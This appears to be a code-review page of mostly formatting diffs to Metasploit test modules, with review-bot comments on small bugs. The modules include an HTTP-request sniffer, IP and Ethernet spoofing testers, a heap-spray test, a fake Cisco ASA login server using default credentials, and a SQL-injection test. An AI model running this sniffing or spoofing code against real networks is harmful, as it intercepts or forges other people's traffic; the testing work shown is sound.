ContainACompleteTest.new
end
class ContainAllSuccesses
def initialize(successes=[])
@successes = successes
@r = Regexr.new(true)
end
def matches?(data)
@data = data
@string = @r.find_strings_that_dont_exist_in_data(@data,@successes)
return true if !@string
nil
end
def failure_message
"expected all successes, but didn't find '#{@string}'"
end
def negative_failure_message
"expected to miss successes but found'm all :("
end
#alias :have_all_successes :contain_all_successes
end
def contain_all_successes(successes=[])
ContainAllSuccesses.new(successes)
end
class ContainNoFailuresExcept
def initialize(failures=[],exceptions=[])
@failures = failures
@exceptions = exceptions
@r = Regexr.new(true)
end
def matches?(data)
@data = data
@string = @r.find_strings_that_exist_in_data_except(@data,@failures,@exceptions)
return true if !@string
nil
end
def failure_message
"expected no failure to be found, but found this: '#{@string}'"
end
def negative_falure_message
"expected to find failures, but didn't find any :("
end
#alias :have_no_failures :contain_no_failures
end
def contain_no_failures_except(failures=[],exceptions=[])
ContainNoFailuresExcept.new(failures,exceptions)
end
end
end end
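Review bot: `ContainNoFailuresExcept` defines `negative_falure_message`, while the two sibling matchers in this file define `negative_failure_message`; the misspelled name survives the re-indent. A framework that looks up the negated-match message by the usual name will presumably not find it on this matcher, so a negated `contain_no_failures_except` expectation would end in a missing-method error rather than the intended text. Renaming it to `def negative_failure_message` brings it in line with the other two.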


@ -6,84 +6,80 @@
class Regexr class Regexr
def initialize(verbose=false, case_insensitive=true) def initialize(verbose = false, case_insensitive = true)
@verbose = verbose @verbose = verbose
@case_insensitive = case_insensitive @case_insensitive = case_insensitive
end end
# Check for the beginning and end lines. Handy when you need to ensure a log has started & completed # Check for the beginning and end lines. Handy when you need to ensure a log has started & completed
def verify_start_and_end(data,the_start,the_end) def verify_start_and_end(data, the_start, the_end)
return false unless data return false unless data
data_lines = data.split("\n") data_lines = data.split("\n")
regex_start = Regexp.new(the_start, @case_insensitive) regex_start = Regexp.new(the_start, @case_insensitive)
regex_end = Regexp.new(the_end, @case_insensitive) regex_end = Regexp.new(the_end, @case_insensitive)
if regex_start =~ data_lines.first if regex_start =~ data_lines.first
return regex_end =~ data_lines.last return regex_end =~ data_lines.last
end end
return false return false
end end
# Scan for any number of success lines. In order to pass, all successes must match. # Scan for any number of success lines. In order to pass, all successes must match.
def find_strings_that_dont_exist_in_data(data,regexes=[]) def find_strings_that_dont_exist_in_data(data, regexes = [])
return false unless data return false unless data
data_lines = data.split("\n") data_lines = data.split("\n")
return nil unless regexes ## count as a pass return nil unless regexes ## count as a pass
if regexes if regexes
target_successes = regexes.size target_successes = regexes.size
success_count = 0 success_count = 0
regexes.each { |condition| regexes.each { |condition|
## assume we haven't got it ## assume we haven't got it
found = false found = false
re = Regexp.new(condition, @case_insensitive) re = Regexp.new(condition, @case_insensitive)
## for each of our data lines ## for each of our data lines
data_lines.each {|line| data_lines.each { |line|
## if it's a match ## if it's a match
if line =~ re if line =~ re
found = true found = true
break ## success! break ## success!
end end
} }
if !found if !found
return condition ## return this string, it wasn't found. return condition ## return this string, it wasn't found.
end end
} }
end end
nil ## got all successes, woot! nil ## got all successes, woot!
end end
# Scan for failures -- if any single failure matches, the test returns true. # Scan for failures -- if any single failure matches, the test returns true.
def find_strings_that_exist_in_data_except(data,regexes=[],exceptions=[]) def find_strings_that_exist_in_data_except(data, regexes = [], exceptions = [])
return false unless data return false unless data
data_lines = data.split("\n") data_lines = data.split("\n")
return nil unless regexes ## count as a pass return nil unless regexes ## count as a pass
regexes.each { |condition| regexes.each { |condition|
## for each failure condition that we've been passed
## for each failure condition that we've been passed
re = Regexp.new(condition, @case_insensitive) re = Regexp.new(condition, @case_insensitive)
## assume we're okay ## assume we're okay
found = false found = false
data_lines.each { |line| data_lines.each { |line|
if re =~ line if re =~ line
found = true # oh, we found a match found = true # oh, we found a match
# but let's check the exceptions # but let's check the exceptions
exceptions.map { |exception| exceptions.map { |exception|
reg_exception = Regexp.new(exception, @case_insensitive) reg_exception = Regexp.new(exception, @case_insensitive)
@ -95,12 +91,12 @@ class Regexr
end end
} }
# If we didn't find an exception, we have to fail it. do not pass go. # If we didn't find an exception, we have to fail it. do not pass go.
return condition if found return condition if found
end end
} }
} }
nil ## no failures found! nil ## no failures found!
end end
end end
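Review bot: Both `find_strings_that_dont_exist_in_data` and `find_strings_that_exist_in_data_except` start with `return false unless data`, and the matchers shown earlier on this page treat any falsy return as a pass (`return true if !@string`). A console run that captured no output at all therefore satisfies both `contain_all_successes` and `contain_no_failures_except`. Failing loudly instead, for example `raise ArgumentError, 'no data to scan' unless data`, would keep an empty capture from being read as a clean result. The body of `find_strings_that_exist_in_data_except` is split across two hunks, so part of it is not visible here.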


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
@ -12,19 +10,17 @@ class MetasploitModule < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'Simple Network Capture Tester', 'Name' => 'Simple Network Capture Tester',
'Description' => 'This module sniffs HTTP GET requests from the network', 'Description' => 'This module sniffs HTTP GET requests from the network',
'Author' => 'hdm', 'Author' => 'hdm',
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Actions' => 'Actions' => [
[ [ 'Sniffer' ]
[ 'Sniffer' ] ],
], 'PassiveActions' => [
'PassiveActions' => 'Sniffer'
[ ],
'Sniffer' 'DefaultAction' => 'Sniffer'
],
'DefaultAction' => 'Sniffer'
) )
deregister_options('RHOST') deregister_options('RHOST')
@ -39,16 +35,15 @@ class MetasploitModule < Msf::Auxiliary
p = PacketFu::Packet.parse(pkt) p = PacketFu::Packet.parse(pkt)
next unless p.is_tcp? next unless p.is_tcp?
next if p.payload.empty? next if p.payload.empty?
if (p.payload =~ /GET\s+([^\s]+)\s+HTTP/smi) if (p.payload =~ /GET\s+([^\s]+)\s+HTTP/smi)
url = $1 url = $1
print_status("GET #{url}") print_status("GET #{url}")
break if url =~ /StopCapture/ break if url =~ /StopCapture/
end end
end end
close_pcap() close_pcap()
print_status("Finished sniffing") print_status("Finished sniffing")
end end
end end


@ -3,33 +3,34 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => "Check Test", update_info(
'Description' => %q{ info,
'Name' => "Check Test",
'Description' => %q{
This module ensures that 'check' actually functions for Auxiilary modules. This module ensures that 'check' actually functions for Auxiilary modules.
}, },
'References' => 'References' => [
[
[ 'OSVDB', '0' ] [ 'OSVDB', '0' ]
], ],
'Author' => 'Author' => [
[
'todb' 'todb'
], ],
'License' => MSF_LICENSE 'License' => MSF_LICENSE
)) )
)
register_options( register_options(
[ [
Opt::RPORT(80) Opt::RPORT(80)
], self.class) ], self.class
)
end end
def check def check


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
@ -12,15 +10,14 @@ class MetasploitModule < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'Simple Ethernet Frame Spoofer', 'Name' => 'Simple Ethernet Frame Spoofer',
'Description' => 'This module sends spoofed ethernet frames', 'Description' => 'This module sends spoofed ethernet frames',
'Author' => 'hdm', 'Author' => 'hdm',
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Actions' => 'Actions' => [
[ [ 'Spoofer' ]
[ 'Spoofer' ] ],
], 'DefaultAction' => 'Spoofer'
'DefaultAction' => 'Spoofer'
) )
end end


@ -3,29 +3,26 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp include Msf::Exploit::Remote::Ftp
def initialize def initialize
super( super(
'Name' => 'FTP Client Exploit Mixin DATA test Exploit', 'Name' => 'FTP Client Exploit Mixin DATA test Exploit',
'Description' => 'This module tests the "DATA" functionality of the ftp client exploit mixin.', 'Description' => 'This module tests the "DATA" functionality of the ftp client exploit mixin.',
'Author' => [ 'Thomas Ring', 'jduck' ], 'Author' => [ 'Thomas Ring', 'jduck' ],
'License' => MSF_LICENSE 'License' => MSF_LICENSE
) )
register_options( register_options(
[ [
OptString.new('UPLOADDIR', [ true, "The directory to use for the upload test", '/incoming' ]) OptString.new('UPLOADDIR', [ true, "The directory to use for the upload test", '/incoming' ])
] ]
) )
end end
def run def run
begin begin
if (not connect_login) if (not connect_login)
return return
@ -34,24 +31,24 @@ class MetasploitModule < Msf::Auxiliary
curdir = "" curdir = ""
# change to the upload directory # change to the upload directory
result = send_cmd( ["CWD", datastore['UPLOADDIR']], true ) result = send_cmd(["CWD", datastore['UPLOADDIR']], true)
print_status("CWD response: #{result.inspect}") print_status("CWD response: #{result.inspect}")
# find out what the server thinks this dir is # find out what the server thinks this dir is
result = send_cmd( ["PWD"], true ) result = send_cmd(["PWD"], true)
print_status("PWD response: #{result.inspect}") print_status("PWD response: #{result.inspect}")
if (result =~ /257\s\"(.+)\"/) if (result =~ /257\s\"(.+)\"/)
curdir = $1 curdir = $1
end end
curdir = "/" + curdir if curdir[0] != "/" curdir = "/" + curdir if curdir[0] != "/"
curdir << "/" if curdir[-1,1] != "/" curdir << "/" if curdir[-1, 1] != "/"
# generate some data to upload # generate some data to upload
data = Rex::Text.rand_text_alphanumeric(1024) data = Rex::Text.rand_text_alphanumeric(1024)
#print_status("data:\n" + Rex::Text.to_hex_dump(data)) # print_status("data:\n" + Rex::Text.to_hex_dump(data))
# test putting data # test putting data
result = send_cmd_data(["PUT", curdir+"test"], data, "I") result = send_cmd_data(["PUT", curdir + "test"], data, "I")
print_status("PUT response: #{result.inspect}") print_status("PUT response: #{result.inspect}")
# test fallthrough # test fallthrough
@ -63,7 +60,7 @@ class MetasploitModule < Msf::Auxiliary
print_status("LS response: #{result.inspect}") print_status("LS response: #{result.inspect}")
# test getting file # test getting file
result = send_cmd_data(["GET", curdir+"test"], "A") result = send_cmd_data(["GET", curdir + "test"], "A")
print_status("GET response: #{result[0].inspect}") print_status("GET response: #{result[0].inspect}")
# see if it matches # see if it matches
@ -74,13 +71,11 @@ class MetasploitModule < Msf::Auxiliary
end end
# adios # adios
result = send_cmd( ["QUIT"], true ) result = send_cmd(["QUIT"], true)
print_status("QUIT response: #{result.inspect}") print_status("QUIT response: #{result.inspect}")
ensure ensure
disconnect disconnect
end end
end end
end end


@ -3,35 +3,35 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info={}) def initialize(info = {})
super(update_info(info, super(
'Name' => "Heaplib2 Test", update_info(
'Description' => %q{ info,
This tests heaplib2. Since it is a test module, it's not intended to do much useful work in the field. 'Name' => "Heaplib2 Test",
}, 'Description' => %q{
'License' => MSF_LICENSE, This tests heaplib2. Since it is a test module, it's not intended to do much useful work in the field.
'Author' => [ 'sinn3r' ], },
'References' => 'License' => MSF_LICENSE,
[ 'Author' => [ 'sinn3r' ],
'References' => [
[ 'URL', 'https://metasploit.com' ] [ 'URL', 'https://metasploit.com' ]
], ],
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' => [
[
[ 'Automatic', {} ] [ 'Automatic', {} ]
], ],
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => '2014-03-01', 'DisclosureDate' => '2014-03-01',
'DefaultTarget' => 0)) 'DefaultTarget' => 0
)
)
end end
def on_request_uri(cli, request) def on_request_uri(cli, request)
spray = %Q| spray = %Q|
function log(msg) { function log(msg) {
@ -71,7 +71,7 @@ class MetasploitModule < Msf::Auxiliary
| |
print_status("Sending html") print_status("Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'}) send_response(cli, html, { 'Content-Type' => 'text/html' })
end end
def run def run

View File

@ -3,46 +3,46 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpServer
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => 'Basic HttpServer Simulator', update_info(
'Description' => %q{ info,
This is example of a basic HttpServer simulator, good for PR scenarios when a module 'Name' => 'Basic HttpServer Simulator',
is made, but the author no longer has access to the test box, no pcap or screenshot - 'Description' => %q{
Basically no way to prove the functionality. This is example of a basic HttpServer simulator, good for PR scenarios when a module
is made, but the author no longer has access to the test box, no pcap or screenshot -
Basically no way to prove the functionality.
This particular simulator will pretend to act like a Cisco ASA ASDM, so the This particular simulator will pretend to act like a Cisco ASA ASDM, so the
cisco_asa_asdm.rb module can do a live test against it. cisco_asa_asdm.rb module can do a live test against it.
}, },
'References' => 'References' => [
[
[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2720' ], [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2720' ],
], ],
'DefaultOptions' => 'DefaultOptions' => {
{
'SRVPORT' => 443, 'SRVPORT' => 443,
'SSL' => true, 'SSL' => true,
'URIPATH' => '/' 'URIPATH' => '/'
}, },
'Author' => [ 'sinn3r' ], 'Author' => [ 'sinn3r' ],
'License' => MSF_LICENSE 'License' => MSF_LICENSE
)) )
)
register_options( register_options(
[ [
OptString.new('USERNAME', [true, "The valid default username", "cisco"]), OptString.new('USERNAME', [true, "The valid default username", "cisco"]),
OptString.new('PASSWORD', [true, "The valid default password", "cisco"]) OptString.new('PASSWORD', [true, "The valid default password", "cisco"])
], self.class) ], self.class
)
deregister_options('RHOST') deregister_options('RHOST')
end end
# #
# Returns a response when the client is trying to check the connection # Returns a response when the client is trying to check the connection
# #
@ -50,7 +50,6 @@ class MetasploitModule < Msf::Auxiliary
send_response(cli, '') send_response(cli, '')
end end
# #
# Returns a response when the client is trying to authenticate # Returns a response when the client is trying to authenticate
# #
@ -59,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
when 'GET' when 'GET'
# This must be the is_app_asdm? method asking # This must be the is_app_asdm? method asking
print_status("Responding to the is_app_asdm? method") print_status("Responding to the is_app_asdm? method")
send_response(cli, '', {'Set-Cookie'=>'webvpn'}) send_response(cli, '', { 'Set-Cookie' => 'webvpn' })
when 'POST' when 'POST'
# This must be the do_login method. But before it can login, it must meet # This must be the do_login method. But before it can login, it must meet
@ -97,22 +96,20 @@ class MetasploitModule < Msf::Auxiliary
end end
end end
def on_request_uri(cli, req) def on_request_uri(cli, req)
print_status("Received request: #{req.uri}") print_status("Received request: #{req.uri}")
case req.uri case req.uri
when '/' when '/'
res_check_conn(cli, req) res_check_conn(cli, req)
when /\+webvpn\+\/index\.html/ when /\+webvpn\+\/index\.html/
res_login(cli, req) res_login(cli, req)
end end
# Request not processed, send a 404 # Request not processed, send a 404
send_not_found(cli) send_not_found(cli)
end end
def run def run
exploit exploit
end end
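Review bot: `on_request_uri` calls `send_not_found(cli)` unconditionally after the `case`, so a request already answered by `res_check_conn` or `res_login` gets a 404 sent to the same client as well. The comment above the call ("Request not processed, send a 404") suggests it was meant for unmatched URIs only. Moving it into the `case` as an `else` branch holding `send_not_found(cli)` would match that intent. `res_login` is only partly visible in these hunks, so whether it responds on every path is an assumption.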


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Capture include Msf::Exploit::Capture
@ -12,10 +10,10 @@ class MetasploitModule < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'Simple IP Spoofing Tester', 'Name' => 'Simple IP Spoofing Tester',
'Description' => 'Simple IP Spoofing Tester', 'Description' => 'Simple IP Spoofing Tester',
'Author' => 'hdm', 'Author' => 'hdm',
'License' => MSF_LICENSE 'License' => MSF_LICENSE
) )
begin begin
@ -25,8 +23,7 @@ class MetasploitModule < Msf::Auxiliary
@@havepcap = false @@havepcap = false
end end
deregister_options('FILTER','PCAPFILE') deregister_options('FILTER', 'PCAPFILE')
end end
def run_host(ip) def run_host(ip)
@ -37,9 +34,9 @@ class MetasploitModule < Msf::Auxiliary
p.ip_ttl = 255 p.ip_ttl = 255
p.udp_sport = 53 p.udp_sport = 53
p.udp_dport = 53 p.udp_dport = 53
p.payload = "HELLO WORLD" p.payload = "HELLO WORLD"
p.recalc p.recalc
ret = send(ip,p) ret = send(ip, p)
if ret == :done if ret == :done
print_good("#{ip}: Sent a packet to #{ip} from #{ip}") print_good("#{ip}: Sent a packet to #{ip} from #{ip}")
else else
@ -48,7 +45,7 @@ class MetasploitModule < Msf::Auxiliary
close_pcap close_pcap
end end
def send(ip,pkt) def send(ip, pkt)
begin begin
capture_sendto(pkt, ip) capture_sendto(pkt, ip)
rescue RuntimeError => e rescue RuntimeError => e
@ -57,5 +54,4 @@ class MetasploitModule < Msf::Auxiliary
return :done return :done
end end
end end


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
@ -12,26 +10,24 @@ class MetasploitModule < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'Simple Recon Module Tester', 'Name' => 'Simple Recon Module Tester',
'Description' => 'Simple Recon Module Tester', 'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm', 'Author' => 'hdm',
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Actions' => 'Actions' => [
[ ['Continuous Port Sweep']
['Continuous Port Sweep'] ],
], 'PassiveActions' => [
'PassiveActions' => 'Continuous Port Sweep'
[ ]
'Continuous Port Sweep'
]
) )
register_options( register_options(
[ [
Opt::RHOST, Opt::RHOST,
Opt::RPORT, Opt::RPORT,
], self.class) ], self.class
)
end end
def run def run
@ -54,8 +50,8 @@ class MetasploitModule < Msf::Auxiliary
disconnect disconnect
report_host(:host => datastore['RHOST']) report_host(:host => datastore['RHOST'])
report_service( report_service(
:host => datastore['RHOST'], :host => datastore['RHOST'],
:port => datastore['RPORT'], :port => datastore['RPORT'],
:proto => 'tcp' :proto => 'tcp'
) )
rescue ::Exception => e rescue ::Exception => e


@ -3,24 +3,26 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
FAKE_IP = '192.168.12.123' FAKE_IP = '192.168.12.123'
FAKE_PORT = 80 FAKE_PORT = 80
FAKE_USER = 'user' FAKE_USER = 'user'
FAKE_PASS = 'password' FAKE_PASS = 'password'
FAKE_PROOF = 'proof' FAKE_PROOF = 'proof'
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => "report_cred Test", update_info(
'Description' => %q{ info,
This module will test every auxiliary module's report_cred method 'Name' => "report_cred Test",
}, 'Description' => %q{
'Author' => [ 'sinn3r' ], This module will test every auxiliary module's report_cred method
'License' => MSF_LICENSE },
)) 'Author' => [ 'sinn3r' ],
'License' => MSF_LICENSE
)
)
end end
def test_novell_mdm_creds def test_novell_mdm_creds
@ -135,7 +137,7 @@ class MetasploitModule < Msf::Auxiliary
def test_dlink_dsl320b_password_extractor def test_dlink_dsl320b_password_extractor
mod = framework.auxiliary.create('admin/http/dlink_dsl320b_password_extractor') mod = framework.auxiliary.create('admin/http/dlink_dsl320b_password_extractor')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF ) mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
end end
def test_nexpose_xxe_file_read def test_nexpose_xxe_file_read
@ -165,7 +167,7 @@ class MetasploitModule < Msf::Auxiliary
def test_vnc def test_vnc
mod = framework.auxiliary.create('server/capture/vnc') mod = framework.auxiliary.create('server/capture/vnc')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'vnc_client', user: '', password: FAKE_PASS, proof: FAKE_PROOF ) mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'vnc_client', user: '', password: FAKE_PASS, proof: FAKE_PROOF)
end end
def test_smtp def test_smtp
@ -175,12 +177,12 @@ class MetasploitModule < Msf::Auxiliary
def test_sip def test_sip
mod = framework.auxiliary.create('server/capture/sip') mod = framework.auxiliary.create('server/capture/sip')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'sip_client', user:FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF) mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'sip_client', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
end end
def test_oracle_login def test_oracle_login
mod = framework.auxiliary.create('admin/oracle/oracle_login') mod = framework.auxiliary.create('admin/oracle/oracle_login')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'oracle', user: FAKE_USER, password: FAKE_PASS ) mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'oracle', user: FAKE_USER, password: FAKE_PASS)
end end
def test_postgresql def test_postgresql
@ -190,12 +192,12 @@ class MetasploitModule < Msf::Auxiliary
def test_pop3 def test_pop3
mod = framework.auxiliary.create('server/capture/pop3') mod = framework.auxiliary.create('server/capture/pop3')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'pop3', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF ) mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'pop3', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
end end
def test_http_basic def test_http_basic
mod = framework.auxiliary.create('server/capture/http_basic') mod = framework.auxiliary.create('server/capture/http_basic')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'HTTP', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF ) mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'HTTP', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
end end
def test_ftp def test_ftp
@ -245,7 +247,7 @@ class MetasploitModule < Msf::Auxiliary
def test_msf_rpc_login def test_msf_rpc_login
mod = framework.auxiliary.create('scanner/msf/msf_rpc_login') mod = framework.auxiliary.create('scanner/msf/msf_rpc_login')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'msf-rpc', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF ) mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'msf-rpc', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
end end
def test_mongodb_login def test_mongodb_login
@ -285,7 +287,7 @@ class MetasploitModule < Msf::Auxiliary
def test_sevone_enum def test_sevone_enum
mod = framework.auxiliary.create('scanner/http/sevone_enum') mod = framework.auxiliary.create('scanner/http/sevone_enum')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: '') mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: '')
end end
def test_sentry_cdu_enum def test_sentry_cdu_enum
@ -305,7 +307,7 @@ class MetasploitModule < Msf::Auxiliary
def test_rfcode_reader_enum def test_rfcode_reader_enum
mod = framework.auxiliary.create('scanner/http/rfcode_reader_enum') mod = framework.auxiliary.create('scanner/http/rfcode_reader_enum')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'RFCode Reader', user: FAKE_USER, password:FAKE_PASS, proof: FAKE_PROOF) mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'RFCode Reader', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
end end
def test_radware_appdictor_enum def test_radware_appdictor_enum
@ -376,7 +378,7 @@ class MetasploitModule < Msf::Auxiliary
def test_vbulletin_vote_sqli_exec def test_vbulletin_vote_sqli_exec
mod = framework.exploits.create('unix/webapp/vbulletin_vote_sqli_exec') mod = framework.exploits.create('unix/webapp/vbulletin_vote_sqli_exec')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF) mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
end end
def test_sap_mgmt_con_brute_login def test_sap_mgmt_con_brute_login
@ -450,8 +452,8 @@ class MetasploitModule < Msf::Auxiliary
end end
def test_d20pass def test_d20pass
mod = framework.auxiliary.create('gather/d20pass') mod = framework.auxiliary.create('gather/d20pass')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'hp', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF) mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'hp', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
end end
def test_doliwamp_traversal_creds def test_doliwamp_traversal_creds
@ -480,11 +482,12 @@ class MetasploitModule < Msf::Auxiliary
end end
def run def run
counter_all = 0 counter_all = 0
counter_good = 0 counter_good = 0
counter_bad = 0 counter_bad = 0
self.methods.each do |m| self.methods.each do |m|
next if m.to_s !~ /^test_.+/ next if m.to_s !~ /^test_.+/
print_status("Trying: ##{m.to_s}") print_status("Trying: ##{m.to_s}")
begin begin
self.send(m) self.send(m)
@ -492,7 +495,7 @@ class MetasploitModule < Msf::Auxiliary
counter_good += 1 counter_good += 1
rescue ::Exception => e rescue ::Exception => e
print_error("That blew up :-(") print_error("That blew up :-(")
print_line("#{e.class} #{e.message}\n#{e.backtrace*"\n"}") print_line("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
counter_bad += 1 counter_bad += 1
ensure ensure
print_line print_line


@ -3,25 +3,23 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner include Msf::Auxiliary::Scanner
def initialize def initialize
super( super(
'Name' => 'Simple Recon Module Tester', 'Name' => 'Simple Recon Module Tester',
'Description' => 'Simple Recon Module Tester', 'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm', 'Author' => 'hdm',
'License' => MSF_LICENSE 'License' => MSF_LICENSE
) )
register_options( register_options(
[ [
Opt::RPORT, Opt::RPORT,
], self.class) ], self.class
)
end end
def run_batch_size def run_batch_size


@ -3,25 +3,23 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner include Msf::Auxiliary::Scanner
def initialize def initialize
super( super(
'Name' => 'Simple Recon Module Tester', 'Name' => 'Simple Recon Module Tester',
'Description' => 'Simple Recon Module Tester', 'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm', 'Author' => 'hdm',
'License' => MSF_LICENSE 'License' => MSF_LICENSE
) )
register_options( register_options(
[ [
Opt::RPORT, Opt::RPORT,
], self.class) ], self.class
)
end end
def run_host(ip) def run_host(ip)


@ -3,33 +3,34 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => "Check Test", update_info(
'Description' => %q{ info,
This module ensures that 'check' actually functions for Auxiilary modules. 'Name' => "Check Test",
}, 'Description' => %q{
'References' => This module ensures that 'check' actually functions for Auxiilary modules.
[ },
'References' => [
[ 'OSVDB', '0' ] [ 'OSVDB', '0' ]
], ],
'Author' => 'Author' => [
[
'todb' 'todb'
], ],
'License' => MSF_LICENSE 'License' => MSF_LICENSE
)) )
)
register_options( register_options(
[ [
Opt::RPORT(80) Opt::RPORT(80)
], self.class) ], self.class
)
end end
def check def check
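Review bot: The description string on the new side still reads `This module ensures that 'check' actually functions for Auxiilary modules.`; `Auxiilary` should be `Auxiliary`, as this is the module's user-facing `'Description'` text. The fix is a one-word change inside the `%q{ }` literal. The rest of this section is re-indentation only.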


@ -8,18 +8,16 @@ class MetasploitModule < Msf::Auxiliary
update_info( update_info(
info, info,
'Name' => 'SQLite injection testing module', 'Name' => 'SQLite injection testing module',
'Description' => ' 'Description' => %q{
This module tests the SQL injection library against the SQLite database management system This module tests the SQL injection library against the SQLite database management system
The target : https://github.com/incredibleindishell/sqlite-lab The target : https://github.com/incredibleindishell/sqlite-lab
', },
'Author' => 'Author' => [
[ 'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>'
'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' ],
],
